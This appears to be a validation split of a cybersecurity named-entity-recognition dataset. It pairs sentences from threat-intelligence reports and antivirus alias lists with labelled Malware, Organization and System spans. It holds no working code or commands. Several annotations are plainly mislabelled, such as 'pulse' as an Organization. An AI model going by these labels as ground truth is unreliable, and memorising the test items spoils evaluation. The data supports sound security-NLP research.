{"text": "PoisonIvy, a Remote Access Tool/Trojan RAT often used in targeted attacks, had been widely seen until around 2013.", "spans": {"Malware: PoisonIvy,": [[0, 10]], "Malware: Remote Access Tool/Trojan RAT": [[13, 42]]}, "info": {"id": "cyner2_valid_000585", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.AutoRun.S6542 RiskWare.GameHack Trojan.Delf.Win32.76215 Trojan/Delf.tkh Trojan.Symmi.DECD2 Win32.Backdoor.Yobdam.a Trojan.Win32.Delf Win32/Trojan.2c8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000587", "source": "cyner2_valid"}}
{"text": "This pulse contain IOC's related to phishing campaigns using the technique described above.", "spans": {"Organization: pulse": [[5, 10]]}, "info": {"id": "cyner2_valid_000588", "source": "cyner2_valid"}}
{"text": "We surmise that the bad guys attempted to gain further access within the victim's network.", "spans": {"System: the victim's network.": [[69, 90]]}, "info": {"id": "cyner2_valid_000590", "source": "cyner2_valid"}}
{"text": "WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report Skipper Turla – the White Atlas framework from mid-2016.", "spans": {"Malware: project": [[24, 31]]}, "info": {"id": "cyner2_valid_000591", "source": "cyner2_valid"}}
{"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks .", "spans": {"Malware: XLoader": [[45, 52]]}, "info": {"id": "cyner2_valid_000592", "source": "cyner2_valid"}}
{"text": "] it Firenze server2mi.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner2_valid_000594", "source": "cyner2_valid"}}
{"text": "This botnet borrows partial code such as port scanning module from the Mirai, but it is completely different from mirai in terms of infect chain, C2 communication protocol, attack module and so on.", "spans": {"Malware: botnet": [[5, 11]], "Malware: code": [[28, 32]], "Malware: the Mirai,": [[67, 77]], "Malware: mirai": [[114, 119]]}, "info": {"id": "cyner2_valid_000595", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.MSIL.CVE-2013-0074.fb Exploit:MSIL/CVE-2013-0074.A Exploit.MSIL.CVE-2013-0074.fb W32/CVE_2013_0074.K!tr Win32/Trojan.Exploit.233", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000597", "source": "cyner2_valid"}}
{"text": "The note synthesizes information found in publicly leaked materials, as well as our own research.", "spans": {}, "info": {"id": "cyner2_valid_000598", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Email.FakeDoc PE:Malware.FakeDOC@CV!1.9C3C PossibleThreat.SB!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000599", "source": "cyner2_valid"}}
{"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry .", "spans": {"Organization: MOSA": [[0, 4]]}, "info": {"id": "cyner2_valid_000600", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Dropper.RYB Trojan.Dropper.RYB TROJ_BLAZGEL.SMT W32/Backdoor2.CFRK Backdoor.Trojan TROJ_BLAZGEL.SMT Trojan.Dropper.RYB Trojan.Win32.Scar.mve Trojan.Dropper.RYB Trojan.Dropper.RYB Trojan.Dropper.RYB BackDoor.Hbeat.70 BehavesLike.Win32.PWSZbot.ch Trojan-GameThief.Win32.OnLineGames Win32.Troj.PcClientT.gb.kcloud Backdoor:Win32/Blazgel.A Troj.Dropper.W32.Delf.lbZp Trojan.Win32.Scar.mve Trojan/Win32.Malco.R7516 Trojan.Dropper.RYB Trojan.Scar Win32.Trojan.Scar.Lnyd W32/Dropper.RTE!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000603", "source": "cyner2_valid"}}
{"text": "Also our visibility as a vendor does not cover every company in the world at least so far ; and the Kaspersky Security Network KSN did not reveal other attacks except those against gaming companies.", "spans": {"Organization: vendor": [[25, 31]], "Organization: Kaspersky Security Network": [[100, 126]], "Organization: gaming companies.": [[181, 198]]}, "info": {"id": "cyner2_valid_000604", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Bumat.28611 Adware/BetterInternet.hu TROJ_PHINIT.SM Multi.Threats.InArchive W32/Trojan2.KHEV Win.Spyware.64804-2 TrojanSpy.Adroder Trojan.PWS.Spy.16470 Trojan.Win32.Small W32/Trojan.VSKJ-6216 Trojan/Win32.Unknown TrojanDownloader:Win32/Phinit.B Trojan.Heur.RP.EDBBFC Trj/CI.A Malware_fam.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000605", "source": "cyner2_valid"}}
{"text": "The mobile ransomware , detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B , is the latest variant of a ransomware family that ’ s been in the wild for a while but has been evolving non-stop .", "spans": {"System: Microsoft Defender": [[36, 54]]}, "info": {"id": "cyner2_valid_000607", "source": "cyner2_valid"}}
{"text": "This RAT, referred to as uWarrior because of embedded PDB strings, has been previously described by an independent researcher who noted a potentially unknown exploit being used against Microsoft Office.", "spans": {"Malware: RAT,": [[5, 9]], "Malware: uWarrior": [[25, 33]], "Organization: independent researcher": [[103, 125]], "Malware: unknown exploit": [[150, 165]], "System: Microsoft Office.": [[185, 202]]}, "info": {"id": "cyner2_valid_000609", "source": "cyner2_valid"}}
{"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers .", "spans": {}, "info": {"id": "cyner2_valid_000610", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Starter.14336.C Trojan.Zenshirsh.SL7 Troj.W32.Explodus.liiL Trojan/Starter.hux TROJ_STARTER_BL1327D4.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Starter.GM TROJ_STARTER_BL1327D4.TOMC Trojan.Win32.Starter.cmtisb Trojan.Hosts.6989 Trojan.Starter.Win32.838 Trojan.Win32.Starter Trojan/Win32.Starter Trojan:Win32/Finkmilt.B!dll Trojan/Win32.Starter.R46071 Trojan.Starter Trojan.Kazy.DAF0C Win32.Trojan.Starter.dgge Trojan.Starter!x33KpsfjiCg Win32/Trojan.1e8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000611", "source": "cyner2_valid"}}
{"text": "The command will be issued as an answer to the beaconing , and the result will be returned to the URL http : // /api/v2/set_state.php Example of the command \" changeServer '' The commands are issued in a JSON format , and the obfuscation is part of the malware code and not added by the packer .", "spans": {}, "info": {"id": "cyner2_valid_000613", "source": "cyner2_valid"}}
{"text": "I have no clue on the exact targets; the website I found was a Dutch website for a hobby group not a really high-ranked target.", "spans": {}, "info": {"id": "cyner2_valid_000614", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Ecltys Trojan.Zusy.Elzob.D6028 BKDR_GANYMEDE.SM Win32.Trojan.WisdomEyes.16070401.9500.9961 W32/Trojan.WWZB-0176 Trojan.Ecltys BKDR_GANYMEDE.SM BehavesLike.Win32.Backdoor.ch Backdoor.Win32.Ecltys BDS/Ecltys.A.15 Backdoor:Win32/Ecltys.A Trojan/Win32.Ecltys.C253327 Win32.Trojan.Ganymede.Ecud Backdoor.Ecltys!+blycSIaf1Y W32/Ecltys.A!tr Win32/Backdoor.eeb", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000615", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32/MalwareF.AAVPK Trojan.AVKill.5434 TROJ_SPNR.0BK211 PWS:Win32/Zuler.B W32/MalwareF.AAVPK Dropper/Win32.Clons MSIL/Injector.PE!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000616", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Crypt.IP Trojan.Win32.OnLineGames.vdso W32/Backdoor2.DVZK Backdoor.Trojan Frethog.J Trojan.Crypt.IP Trojan.DR.Nepotemp!/l3wjl8GZiw Trojan.Win32.AntiAV.454656 Trojan.Crypt.IP Trojan.MulDrop4.23385 TROJ_NEPOTMP.SMT Win32/DropDown.a TrojanDropper:Win32/Nepotemp.A Dropper/Win32.OnlineGameHack Trojan.Crypt.IP W32/Backdoor.XAXT-1489 TrojanPSW.WOW Backdoor.Trojan Trojan-Dropper.Win32.Nepotemp Trj/Downloader.MDW", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000617", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9559 TROJ_PLEADLDR.ZAEH-A TROJ_PLEADLDR.ZAEH-A Trojan:Win32/Harmony.B!dha Trojan.Graftor.D5A2C5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000618", "source": "cyner2_valid"}}
{"text": "Here ’ s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice .", "spans": {}, "info": {"id": "cyner2_valid_000619", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.SasfisQKC.Fam.Trojan Backdoor/W32.Androm.72784 Trojan.Win32.Menti!O Trojan.Menti.Win32.1491 Trojan.Kazy.D4828 Win32.Trojan.WisdomEyes.16070401.9500.9929 TROJ_ZKRYPT.SMIH Win.Trojan.Menti-2002 Troj.Spy.W32.Zbot.lzkr Trojan.Proxy.20008 TROJ_ZKRYPT.SMIH BehavesLike.Win32.Trojan.lc Trojan/Menti.bsb TR/Menti.72784a.3 Trojan/Win32.Menti Trojan/Win32.Menti.C64869 BScope.Trojan-Dropper.TDSS.01313 Trojan.Menti!IOdity46ghk Trojan.Win32.Rimecud", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000621", "source": "cyner2_valid"}}
{"text": "We certainly weren't the only ones who saw this malware, and many others have also reported on it.", "spans": {}, "info": {"id": "cyner2_valid_000622", "source": "cyner2_valid"}}
{"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples .", "spans": {"Malware: Svpeng": [[94, 100]]}, "info": {"id": "cyner2_valid_000624", "source": "cyner2_valid"}}
{"text": "We hope that this blog post helps other researchers to understand and analyze FinFisher samples and that this industry-wide information-sharing translate to the protection of as many customers as possible .", "spans": {"Malware: FinFisher": [[78, 87]]}, "info": {"id": "cyner2_valid_000625", "source": "cyner2_valid"}}
{"text": "Today, a coordinated coalition involving AlienVault and several other security companies led by Novetta is announcing Operation BlockBuster.", "spans": {"Organization: AlienVault": [[41, 51]], "Organization: security companies": [[70, 88]], "Organization: Novetta": [[96, 103]]}, "info": {"id": "cyner2_valid_000626", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TazokeDAT.Trojan Ransom/W32.Crypren.535040 Ransom.Gibon.S1626077 Ransom.Gibon Ransom_Nobig.R002C0DKE17 Ransom.CryptXXX Ransom_Nobig.R002C0DKE17 Win32.Trojan-Ransom.Gibon.A Trojan.Win32.Mlw.euswlf Trojan.Win32.Z.Crypren.535040 Trojan.Encoder.15110 Trojan.Crypren.Win32.549 BehavesLike.Win32.Virut.hh Trojan.Win32.Filecoder Trojan.Crypren.kd TR/Crypren.iqwad Trojan.Ransom.Gibon.5 Trojan/Win32.Crypren.R212092 Trojan.Ransom.Gibon Trojan-Ransom.Crypren Trj/GdSda.A W32/Filecoder_Gibon.A!tr Win32/Trojan.ab6", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000628", "source": "cyner2_valid"}}
{"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in last six months .", "spans": {"System: Android": [[79, 86]]}, "info": {"id": "cyner2_valid_000629", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: PSW.QQPass.13965 TSPY_QQPASS.SMIB Win32.Trojan.Pebox.l W32/Dropper.AMTL Trojan.Dropper Win32/Gamepass.XN TSPY_QQPASS.SMIB Win.Trojan.Magania-11938 BehavesLike.Win32.PWSZbot.vc W32/Risk.FVMX-1597 Trojan[GameThief]/Win32.Magania TrojanDropper:Win32/Nemqe.B Trojan/Win32.OnlineGameHack.R7674 TScope.Malware-Cryptor.SB Trojan.DR.Darsing.A Virus.Win32.Rootkit Trj/Dropper.JSF Win32/Virus.236", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000630", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TrojanDropper.Dogrobot.G4 Trojan/Dalixi.c Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/Dogrobot.WH Rootkit.Win32.AntiAv.pem Trojan.TenThief.DNFTrojan.bbxd TrojWare.Win32.KillAV.MN Trojan.DownLoader5.43567 BehavesLike.Win32.Dropper.nc Trojan.Kazy.D1A92 Rootkit.Win32.AntiAv.pem TrojanDropper:Win32/Dogrobot.G Dropper/Win32.Mudrop.R5283 Rootkit.AntiAv", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000631", "source": "cyner2_valid"}}
{"text": "It is possible thanks to the modular design of this malware – it consists of the main binary the one user downloads and infects with, which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own.", "spans": {}, "info": {"id": "cyner2_valid_000632", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 TROJ_INJECTOR_GE08008A.UVPM Trojan.Win32.Inject.aeyfy Trojan.Win32.Inject.eogwxj Troj.W32.Inject!c Win32.Trojan.Inject.Ajvg Trojan.Inject.Win32.237018 TROJ_INJECTOR_GE08008A.UVPM W32/Trojan.ALUY-5414 W32.Adware.Installcore TR/Crypt.ZPACK.vbjap Trojan.Zusy.D39918 Trojan.Win32.Z.Zusy.376832.JH Trojan.Win32.Inject.aeyfy TrojanDownloader:Win32/Nitedrem.F!bit Trojan/Win32.MDA.C1930371 Trojan.Inject Trojan.Inject!cIMjgJ170GI Trojan.Win32.Injector", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000633", "source": "cyner2_valid"}}
{"text": "The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to", "spans": {"Organization: the Russian Federation": [[121, 143]]}, "info": {"id": "cyner2_valid_000634", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Mesgra.712704 Trojan.Mesgra.Win32.1 Trojan/Mesgra.a W32/Trojan.BMYL Trojan.Win32.FlyStudio.zmcq BehavesLike.Win32.Downloader.jc W32/Trojan.JNKV-8773 TR/PSW.Mesgra.dcjkp PWS:Win32/Mesgra.A Trojan.Strictor.D557F Trojan.Win32.PSWMesgra.712704 Win32.Adware.FlyStudio.N Trojan.FlyStudio MemScanTrojan.Flystudio.B Trj/Mesgra.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000636", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9977 W32/VBTrojan.Dropper.4!Maximus Win.Trojan.StartPage-43 Trojan.Win32.StartPage.emcdkj Trojan.Win32.Z.Startpage.81920 BehavesLike.Win32.VBObfus.mm W32/VBTrojan.Dropper.4!Maximus VBS/StartPage.BG Win32.Troj.Alipay.lx.kcloud Trojan.Heur.RX.E7A72D Trojan:VBS/Startpage.AY Trj/GdSda.A Script/Virus.b54", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000637", "source": "cyner2_valid"}}
{"text": "This quest to determine the currently running application is a hallmark of overlay malware , so we thought we ’ d take a closer look at how it ’ s done .", "spans": {}, "info": {"id": "cyner2_valid_000639", "source": "cyner2_valid"}}
{"text": "Iron Tiger is an advanced persistent threat APT group that has been focused primarily on cyberespionage for more than a decade.", "spans": {}, "info": {"id": "cyner2_valid_000640", "source": "cyner2_valid"}}
{"text": "The class “ org.starsizew.Ma ” is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its “ onReceive ” API .", "spans": {"System: Android": [[120, 127]]}, "info": {"id": "cyner2_valid_000641", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Win32.RemoteManipulator.iiq Trojan.Script.RMS.enpelx BackDoor.RMS.82 BehavesLike.Win32.AdwareLinkury.rc Backdoor.Win32.RemoteManipulator.iiq Win32/Trojan.a50", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000642", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Webus.D WORM_MEDBOT.AI Trojan.Win32.Dedler.fkxr Worm.Win32.Robobot._0 Trojan.Proxy.157 WORM_MEDBOT.AI Win32.Hack.Robobot.a.kcloud Backdoor:Win32/Robobot.A Trojan.Webus", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000643", "source": "cyner2_valid"}}
{"text": "Criminals started distributing Linux.MulDrop.14 in the second half of May.", "spans": {}, "info": {"id": "cyner2_valid_000644", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.Filunork.A5 Trojan.Ransom.FO WS.Reputation.1 Trojan.MulDrop4.37988 Trojan/PornoBlocker.cwn Worm:Win32/Filunork.A BScope.Trojan-Downloader.Obfuscated Trojan.FakeFolder!4EF8 Worm.Win32.Filunork W32/Filunork.AB!tr Worm.Win32.Filunork.adI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000645", "source": "cyner2_valid"}}
{"text": "The specific apps can be found in the target list in the appendix .", "spans": {}, "info": {"id": "cyner2_valid_000646", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Clicker.bdbxsa Trojan.Click2.104 Trojan.Symmi.669", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000647", "source": "cyner2_valid"}}
{"text": "This blog details the evolution of this malware family, which was first witnessed in December 2015, as well as provides various indicators of compromise IOCs that can be used by the security community.", "spans": {"Malware: malware family,": [[40, 55]], "Organization: the security community.": [[178, 201]]}, "info": {"id": "cyner2_valid_000648", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsAutoB.8DE4 Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania!O Packer.Malware.NSAnti.1 TSPY_MAGANIA.AKD Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/PWStealer.OFV Trojan.Packed.NsAnti TSPY_MAGANIA.AKD Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.dsg Packer.Malware.NSAnti.1 Trojan.Win32.NSAnti.fthc Troj.PSW32.W.OnLineGames.kYJw Packer.Malware.NSAnti.1 Packer.Malware.NSAnti.1 Trojan.MulDrop.31693 Trojan.Win32.4CD56CB8 BehavesLike.Win32.PWSGamania.cc Trojan-GameThief.Win32.Magania W32/PWStealer.OFV Packer.Malware.NSAnti.1 Trojan-GameThief.Win32.Magania.dsg Trojan/Win32.Magania.R31316 Malware-Cryptor.Win32.NSAnti Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000649", "source": "cyner2_valid"}}
{"text": "Quaverse RAT or QRAT is a fairly new Remote Access Tool RAT introduced in May 2015.", "spans": {"Malware: Quaverse RAT": [[0, 12]], "Malware: QRAT": [[16, 20]], "Malware: Remote Access Tool RAT": [[37, 59]]}, "info": {"id": "cyner2_valid_000650", "source": "cyner2_valid"}}
{"text": "One thing is certain, it's not a new threat.", "spans": {}, "info": {"id": "cyner2_valid_000653", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.A.Downloader.93184 Trojan.DownLoad1.45438 BehavesLike.Win32.Virut.nm TrojanDownloader:Win32/Netins.A Trj/StartPage.DGJ", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000654", "source": "cyner2_valid"}}
{"text": "We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine , and to validate the effectiveness of Office 365 ATP detonation sandbox , Windows Defender Advanced Threat Protection ( Windows Defender ATP ) generic detections , and other Microsoft security solutions .", "spans": {"Malware: FinFisher": [[50, 59]], "System: Office 365 ATP": [[143, 157]], "System: Windows Defender Advanced Threat Protection": [[179, 222]], "System: Windows Defender ATP": [[225, 245]], "Organization: Microsoft": [[279, 288]]}, "info": {"id": "cyner2_valid_000655", "source": "cyner2_valid"}}
{"text": "Both versions still appear to be active.", "spans": {}, "info": {"id": "cyner2_valid_000656", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Worm.Autorun.bm Trojan.Win32.NaKocTb.errzoc BehavesLike.Win32.Adware.gt Trojan.Miner.hs Trojan:Win32/Bomner.A!bit Trojan/Win32.Zurgop.C2007044", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000657", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9911 Ransom:MSIL/Rasoon.A Trj/RnkBend.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000658", "source": "cyner2_valid"}}
{"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant .", "spans": {}, "info": {"id": "cyner2_valid_000660", "source": "cyner2_valid"}}
{"text": "The most significant change in this particular Trojan ’ s history was the encryption of data sent between the device and C & C .", "spans": {}, "info": {"id": "cyner2_valid_000661", "source": "cyner2_valid"}}
{"text": "Office 365 Advanced Threat Protection secures mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher .", "spans": {"System: Office 365 Advanced Threat Protection": [[0, 37]], "Vulnerability: zero-day exploits": [[86, 103]], "Malware: FinFisher": [[128, 137]]}, "info": {"id": "cyner2_valid_000662", "source": "cyner2_valid"}}
{"text": "Mirai is known for the ease with which it can victimize IoT devices.", "spans": {"Malware: Mirai": [[0, 5]], "System: IoT devices.": [[56, 68]]}, "info": {"id": "cyner2_valid_000663", "source": "cyner2_valid"}}
{"text": "The value of the first item , whose key is “ method ” ( line 7 ) , indicates the type of the contents : install , info and sms .", "spans": {}, "info": {"id": "cyner2_valid_000664", "source": "cyner2_valid"}}
{"text": "In mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious emails.", "spans": {"Organization: Unit 42 researchers": [[23, 42]], "Organization: open-source developers": [[70, 92]]}, "info": {"id": "cyner2_valid_000665", "source": "cyner2_valid"}}
{"text": "Zen does n't even check for the root privilege : it just assumes it has it .", "spans": {"Malware: Zen": [[0, 3]]}, "info": {"id": "cyner2_valid_000666", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TROJ_HPUTOTI.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9809 Trojan-PSW.Win32.Fareit.bona Troj.Psw.W32.Fareit!c Trojan.PWS.Steam.15269 W32/Trojan.COEA-5117 DR/Autoit.royix PWS:Win32/Stimilini.K Trojan-PSW.Win32.Fareit.bona Trojan/Win32.HDC.C437658 TrojanDropper.Injector Trj/CI.A Win32/Injector.Autoit.CEM Win32.Trojan-qqpass.Qqrob.Alio W32/Autoit.CEM!tr Win32/Trojan.Dropper.a18", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000667", "source": "cyner2_valid"}}
{"text": "Online video streaming sites have always been some of the most visited destinations on the web.", "spans": {}, "info": {"id": "cyner2_valid_000668", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.MasiveNV.Trojan Trojan.Krap Win32.Worm.Mira.a W32.SillyFDC Packed.Win32.Krap.jc Trojan.Win32.Krap.evgeam Worm.Win32.Mira.AA Trojan.MulDrop5.32888 Trojan.Win32.Heur Trojan[Packed]/Win32.Krap Trojan:Win32/Skeeyah.A!rfn Packed.Win32.Krap.jc HEUR/Fakon.mwf Worm.Win32.Mira.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000669", "source": "cyner2_valid"}}
{"text": "Rock then deletes shadow copies and disables system restore.", "spans": {"Malware: Rock": [[0, 4]]}, "info": {"id": "cyner2_valid_000670", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Win32.Hupigon!O Trojan.Malamaged Trojan/Spy.Montp.we Backdoor.Graybird Win.Spyware.18090-1 Trojan.Win32.Dnfse.cudocq Backdoor.Win32.GrayBird.4098462 Backdoor.Win32.Pigeon.~VF Trojan.QQPass.Win32.523 BehavesLike.Win32.BadFile.gh Backdoor.Pigeon BDS/Pigeon.DTQ.12 TrojanSpy.Montp Trj/CI.A Trojan.Malamaged!HSrWyLJr12c Win32/Backdoor.085", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000672", "source": "cyner2_valid"}}
{"text": "However, since then we have released more than a dozen detailed posts on Pawn Storm.", "spans": {}, "info": {"id": "cyner2_valid_000673", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Sputnik.D TROJ_PSUTNIK.SM TrojWare.Win32.Kryptik.ANIS TROJ_PSUTNIK.SM Backdoor:Win32/Tarctox.B Backdoor.Rocra Backdoor.Tarctox!4EC5 Trojan.Crypt W32/Kryptik.APOJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000674", "source": "cyner2_valid"}}
{"text": "The Turla espionage group has been targeting various institutions for many years.", "spans": {"Organization: institutions": [[53, 65]]}, "info": {"id": "cyner2_valid_000675", "source": "cyner2_valid"}}
{"text": "This mandatory policy has become one of the most important mechanisms in the iOS security ecosystem to ensure the privacy and security of iOS users.", "spans": {"System: iOS security ecosystem": [[77, 99]], "Organization: iOS users.": [[138, 148]]}, "info": {"id": "cyner2_valid_000676", "source": "cyner2_valid"}}
{"text": "The functionality for these two parts is implemented by doInBackground and onPostExecute respectively , two API methods of “ android.os.AsyncTask ” as extended by class “ org.starsizew.i ” .", "spans": {}, "info": {"id": "cyner2_valid_000678", "source": "cyner2_valid"}}
{"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT .", "spans": {"Organization: Hamas": [[0, 5]], "Malware: ViperRAT": [[131, 139]]}, "info": {"id": "cyner2_valid_000679", "source": "cyner2_valid"}}
{"text": "Its code contains a reference to Sauron, the all-seeing antagonist in Lord of the Rings.", "spans": {}, "info": {"id": "cyner2_valid_000681", "source": "cyner2_valid"}}
{"text": "By doing so , attackers can easily set up the Trojan to communicate back to them without any need for high-end servers .", "spans": {}, "info": {"id": "cyner2_valid_000682", "source": "cyner2_valid"}}
{"text": "It specifically targets two of the largest online poker sites: PokerStars and Full Tilt Poker.", "spans": {}, "info": {"id": "cyner2_valid_000684", "source": "cyner2_valid"}}
{"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect .", "spans": {"System: Google Play Protect": [[82, 101]]}, "info": {"id": "cyner2_valid_000685", "source": "cyner2_valid"}}
{"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play .", "spans": {"System: Android-based": [[47, 60]], "System: Android": [[73, 80]], "System: Google Play": [[183, 194]]}, "info": {"id": "cyner2_valid_000686", "source": "cyner2_valid"}}
{"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up .", "spans": {"Organization: NQ Mobile Security": [[53, 71]], "System: Android": [[117, 124]]}, "info": {"id": "cyner2_valid_000687", "source": "cyner2_valid"}}
{"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file .", "spans": {}, "info": {"id": "cyner2_valid_000688", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.Plupay Win32.Trojan.WisdomEyes.16070401.9500.9995 Virus.W32.Virus!c Backdoor:MSIL/Plupay.A!bit Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000689", "source": "cyner2_valid"}}
{"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather .", "spans": {"System: AccuWeather": [[333, 344]]}, "info": {"id": "cyner2_valid_000691", "source": "cyner2_valid"}}
{"text": "Bluecoat: As a part of the daily work process, I keep an eye on the latest incoming samples to ensure detection in our Malware Appliance.", "spans": {"Organization: Bluecoat:": [[0, 9]], "Malware: Malware Appliance.": [[119, 137]]}, "info": {"id": "cyner2_valid_000692", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Arefty Trojan:Win32/Arefty.B Trj/CI.A Trojan.Win32.Arefty", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000693", "source": "cyner2_valid"}}
{"text": "The attacks have been carried out by means of well-drafted emails that were written in flawless Danish and that were sent to carefully selected targets.", "spans": {}, "info": {"id": "cyner2_valid_000694", "source": "cyner2_valid"}}
{"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent .", "spans": {}, "info": {"id": "cyner2_valid_000695", "source": "cyner2_valid"}}
{"text": "Unit 42 has identified malware with recent compilation and distribution timestamps that has code, infrastructure, and themes overlapping with threats described previously in the Operation Blockbuster report, written by researchers at Novetta.", "spans": {"Organization: Unit 42": [[0, 7]], "Malware: malware": [[23, 30]], "System: infrastructure,": [[98, 113]], "Malware: threats": [[142, 149]], "Organization: researchers": [[219, 230]], "Organization: Novetta.": [[234, 242]]}, "info": {"id": "cyner2_valid_000696", "source": "cyner2_valid"}}
